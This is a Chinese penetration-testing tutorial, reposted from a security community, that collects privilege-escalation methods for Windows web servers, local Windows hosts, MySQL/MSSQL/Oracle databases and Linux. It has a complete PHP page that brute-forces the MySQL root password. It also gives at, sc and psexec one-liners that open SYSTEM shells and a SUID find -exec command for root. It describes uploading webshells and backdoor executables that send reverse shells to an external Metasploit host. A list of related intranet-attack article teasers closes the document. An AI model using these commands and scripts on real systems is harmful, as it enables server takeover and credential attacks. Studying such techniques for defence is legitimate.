文章出处：奇安信攻防社区-实战遇见到的好用提权方法合集 (butian.net)

权限提升全集

写在前面

权限提升对我们在深度渗透过程中起着重要作用，接下来我将介绍web提权、本地提权、数据库提权、linux提权。

权限的划分

1、system账户
Windows系统最高级别的权限是System用户权限，有一些操作需要System权限才能完成，比如修改注册表核心键值、强制结束恶意应用程序进程等。
2、管理员账户
具有最高的管理和使用权限，能改变系统所有设置，可以安装和删除程序，能访问计算机上所有的文件。除此之外，它还拥有控制其他用户的权限。
3、普通用户账户
某些功能的使用，是受到一定限制的账户，在系统中可以创建多个此类账户，也可以改变其账户类型。该账户可以访问已经安装在计算机上的程序，可以设置自己账户的图片、密码等，但无权更改大多数计算机的设置。

Web提权

获取网站权限后，我们仅仅只能对网站操作，无法对服务器进行操作，需要对服务器进行提权，获取到更高权限。
案例演示
1.上传后门文件，获取到webshell权限

2.在web权限提升中，最常用的是溢出漏洞提权，用cmd去执行文件进行提权，从下图可以清晰的看到我们在webshell看到的权限和服务器上看到的权限是不一样的。

3.利用systeminfo进行信息收集，一般关注操作系统版本，打过的补丁编号。

4.获取到补丁编号后，我们要进行补丁筛选，推荐两个优秀项目：wesng , windowsVulnScan。将上面收集到的信息保存到1.txt中，利用wesng进行补丁筛选
下载地址分别为：
GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
GitHub - chroblert/WindowsVulnScan

5.执行完后会将可能存在的漏洞保存在vuln.csv中

6.利用MSF或特定EXP进行提权（msf要搭建在外网，才能将会话反弹到本机，内网不能反弹）生成一个5577.exe后门，webshell执行该后门，反弹的端口号为5577
Msf安装教程:Linux下搭建外网Msf

7.设置监听端口为5577

8.端口反弹的权限为web权限

9.利用wesng中收集到的漏洞编号，进行模块利用，并且设置反弹端口，此时的端口号应该与前面的不同，这个端口反弹的权限为提权后的权限，并且监听的回话为3，与上面的会话对应

10.成功反弹system权限

本地提权

获取本地普通用户的权限后，要将权限提升为更高权限，本地提权的成功概率比web提权更高。
案例演示
1.系统溢出漏洞提权
直接网上下载BitsArbitraryFileMoveExploit.exe,运行就可以提升为系统权限

2.AT命令提权:
at 13:36 /interactive cmd.exe (在13：36分生成一个交互式的System权限的cmd)
使用版本：Win2000 & Win2003 & XP

3.SC命令提权：
sc Create syscmd binPath= “cmd /K start” type= own type= interact #创建一个名叫syscmd的新的交互式的cmd服务
sc start syscmd #得到了system权限的cmd环境
适用版本：windows 7、8、03、08

4.PS命令提权
微软工具包：PsTools - Windows Sysinternals | Microsoft Docs
psexec.exe -accepteula -s -i -d cmd.exe
适用版本：Win2003 & Win2008

数据库提权

Mysql数据库提权
利用UDF提权
在利用UDF提权时前提是我们需要知道数据库的密码，而在正常情况下MySQL数据库不支持外连，此时如果我们用工具爆破不了，可以上传脚本进行爆破，脚本如下：

<html><head><title>Mysql账号密码爆破工具</title><m eta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><center><br><br><h1>MysqlDatab aseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1><br>
<?phpif(@$_POST['submit']){$host = @$_POST['host'];if($host!=""){$username = "root";//用户名字典$password = array('','123456','admin','root123','ccf304vn'); //密码字典echo "<hr><br>--------------------爆破状态--------------------<br>";echo "密码错误次数：";for ($i=0; $i <= count($password); $i++) {if(@mysql_connect($host, $username, $password[$i])){echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>";break;}else{echo $i."、";continue;}}echo "<br>--------------------爆破结束--------------------<br><hr>";}else{echo "<s cript>a lert('黑客，输入数据库IP地址')</s cript>";}}
?>
<br><br><br><br><form action="MysqlDatab aseBlasting.php" method="post">数据库IP地址:<input type="text" name="host"/><input type="submit" value="爆破" name="submit"/></form>
<center>
</body></html>

有些提权网上已经写得很完整，所以接下来有的提权过程就没有演示，这是我收集的比较好的文章，请大家参考。https://blog.csdn.net/qq_36119192/article/d etails/84863268
2.Mssql数据库提权
请参考：通过Mssql提权的几种姿势 - N0r4h - 博客园
3.Oracle数据库提权
分为以下三种模式：
普通用户模式
前提是拥有一个普通的Oracle连接账号，不需要DBA，并以Oracle实例运行的权限执行操作系统命令。
DBA用户模式
拥有DBA账号密码，可以省去自己手动创建存储过程的繁琐步骤，一键执行测试。
注入提升模式
拥有一个Oracle注入点，可以通过注入点执行系统命令，此种模式没有实现回显，需要自己验证。
一般Oracle数据库利用这个工具进行提权（自带以上三种提权方式）
下载地址:GitHub - jas502n/oracleShell: oracle 数据库命令执行

Linux操作系统提权

推荐两个开源的项目
信息收集脚本
LinEnum-master：https://github.com/rebootuser/LinEnum
漏洞探针脚本，获取可能存在的漏洞
linux-exploit-suggester：https://github.com/mzet-/linux-exploit-suggester
在进行linux提权时，推荐使用冰蝎，因为冰蝎里面有很多集成化功能，可以反弹shell到msf中。
下载地址：https://github.com/rebeyond/Behinder
案例演示
1.SUID提权
漏洞成因：在对文件进行权限设置时，给了文件suid权限，在执行该文件时，会调用特定用户
上传一个脚本到网站，利用冰蝎连接，设置反弹shell

在msf中执行上面的命令，web权限反弹到msf中

上传漏洞探针脚本，并执行，查看是否有suid提权的可能性

执行一下命令，成功提升为root用户
touch shenghuo
find shenghuo -exec whoami \;
2.内核漏洞提权
在内核漏洞提权时，前提要是本地用户才能进行提权
请参考：https://www.moonsec.com/archives/379
3.脏牛提权
请参考：脏牛Linux本地提权漏洞(CVE-2016-5195) - Bypass - 博客园
4.定时任务提权
请参考：利用定时任务（Cronjobs）进行Linux提权 | 一个IDC
5.环境变量提权
请参考：在Linux中使用环境变量进行提权 - FreeBuf网络安全行业门户

内网渗透总结一：第一步提权相关推荐

内网渗透--基于密码的破解提权
密码获取的常用手段 1.通过中间人劫持:网络窃听 2.通过用户主机窃听:键盘记录 3.通过简单猜测:常用密码 4.通过系统漏洞:永恒之蓝 5.用户自己泄漏: git. 配置文件等泄漏方式 6.通过系统 ...
【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝
文章目录章节点横向移动-系统漏洞-CVE-2017-0146(永恒之蓝) 影响版本插件检测-横向移动 CS联动MSF-检测&利用横向移动-域控提权-CVE-2014-6324 横向移动 ...
【内网—权限提升】——linux本地提权_脏牛漏洞提权
文章目录一.实验目的: 二.工具: 三.实验环境: 四.漏洞说明: 1. 原理: 2. 漏洞成因: 五.环境准备: 1. 安装Apache及php环境: 2. 安装gcc编译器(C语言编译器): 2 ...
红蓝对抗 linux内网渗透
目录一.前言二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...
内网渗透-Linux内网渗透
系列文章目录文章目录系列文章目录一.Linux内网渗透二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权三.隧道 3.1 SSH ...
0x02 内网渗透篇
来源如下图:(微信公众号:0x00实验室) 00 - 内网渗透的流程拿到跳板后,先探测一波内网存活主机,用net user /domian命令查看跳板机是否在域内,探测存活主机.提权.提取hash ...
3.内网渗透之reGeorg+Proxifier
本文旨在学习内网渗透代理工具reGeorg+Proxifier工具的使用和利用. 工具介绍: reGeorg是reDuh的继承者,利用了会话层的socks5协议,而Proxifier是一款强大的soc ...
Linux的内网渗透入门教程：第一节通过arp欺骗进行网关劫持，截获别人手机的图片（VMware环境）
免责声明:本人提供的任何工具.文章和知识,只可研究学习,本人对使用这些工具.文章和知识而导致的一切后果,不承担任何法律责任.请大家文明上网,远离网络非法行为! 一.引言这是本人第一次写博客,据我一位 ...
内网渗透测试第一章——内网基础知识
(一)内网基础知识 1. 内网概述内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组.一般是方圆几千米以内.局域网可以实现文件管理.应用软件共 ...

内网渗透总结一：第一步提权